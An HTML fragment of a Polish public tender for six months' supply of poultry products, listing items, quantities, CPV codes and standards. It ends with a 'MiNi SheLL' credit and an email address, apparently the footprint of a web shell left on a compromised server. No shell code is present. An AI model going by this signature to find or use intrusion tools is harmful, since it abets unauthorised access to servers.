<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1
Udko drobiowe
Świeży - nie mrożony element kurczaka zawierający pałkę i podudzie (bez kręgosłupa) 

kg

700
1
15112000-6



1
PN-A-86524



2
Filet z piersi kurczaka
Świeży - nie mrożony element drobiowy pozbawiony kości, mięsień piersiowy tuszki

kg

50
2
15112000-6



2
PN-A-86524



3
Filet z indyka
Świeży - nie mrożony element indyczy pozbawiony kości, mięsień piersiowy tuszki

kg

30
3
15112000-6



3
PN-A-86524



4
Kurczak świeży
Świeży - nie mrożony kurczak 

kg

900
4
15112000-6



4
PN-86524



5
Porcje rosołowe z indyka
świeże nie mrożone 

kg

200
5
15112120



5
PN-A-86524



Podroby drobiowe
6
Kiełbasa drobiowa parówkowa
Produkt świeży głównie z mięsa drobiowego rozdrobniony do homogennej masy w osłonkach naturalnych, produkt wędzony i parzony

kg

200
6
1513500-0



6
PN-A-86523



7
Polędwica drobiowa
bostońska
Skład surowcowy : filet indyczy , izolat białka sojowego , sól , cukry ,przyprawy , woda , stabilizatory , konserwant ,przeciwutleniacz , wzmacniacz smaku , w osłonkach sztucznych 

kg

50
7
1513500-0



7
PN-A-86526/A 1:1998



8
Wątróbka drobiowa
Element świeży podrobowy z kurczaka

kg

250
8
1513500-0



8
PN-A-86523



9
Szynka Gerwazego
Wyrób średnio rozdrobniony parzony.
Mięso indycze 32% 

kg

100
9
15131135



9
PN-A-86526/A



10
Rolada drobiowa
Mięso drobiowe, średnioro zdrobnione, produkt parzony w sztucznej osłonce

kg

60
10
1513500-0



10
PN-A-86526/A1:1998



11
Schab drobiowy z ziołami
mięso drobiowe średnio rozdrobnione w osłonkach sztucznych z przyprawami , produkt parzony

kg

50
11
1513500-0



11
PN-A-86523



12
Żywiecka drobiowa
Produkt świeży z mięsa drobiowego rozdrobnionego w osłonkach- produkt wędzony i parzony

kg

50
12
1513500-0



12
PN-A-86523



13
Kiełbasa biała parzona

Kiełbasa średnio-rozdrobniona extra I gatunek w naturalnej osłonce, mieso drobiowe 

kg

200
13
1513500-0



13
PN-A-86526:1995



14
Parówki drobiowe 
Produkt świeży z mięsa drobiowego, rozdrobniony do masy homogennej w osłonce naturalnej

kg

150
14
15131135



14
PN-A-86526:1995



15
Polędwica Miodowa
o składzie : mięso z indyka 48,8 % ,woda , skrobia ziemniaczana , skorki wieprzowe, sól ,białko sojowe, zagęstnik , stabilizator, przyprawy naturalne i ich ekstrakty , przeciwutleniacz , substancje wzmacniające smak ,aromaty , miód, substancje konserwujące  

kg

80
15
151131135



15
PN-A-86526:1995



16
Pierś królewiecka
Wyrób parzony ; Filet z indyka 50,5% 

kg

60

16
15131135



16
ZN-BB-11/01/2006



17
Polędwica sławska
mięso drobiowe średnio rozdrobnione w osłonkach sztucznych , produkt parzony

kg

60

17
151131135



17
PN-A-86526:1995



18
Pasztet pieczony
Mięso drobiowe i podroby, rozdrobniony, I gatunek
kg
100
18
15131310-1


100
18



100
19
Pasztet z drobiu
Konserwa 50 g
szt
300.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2, 15.11.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com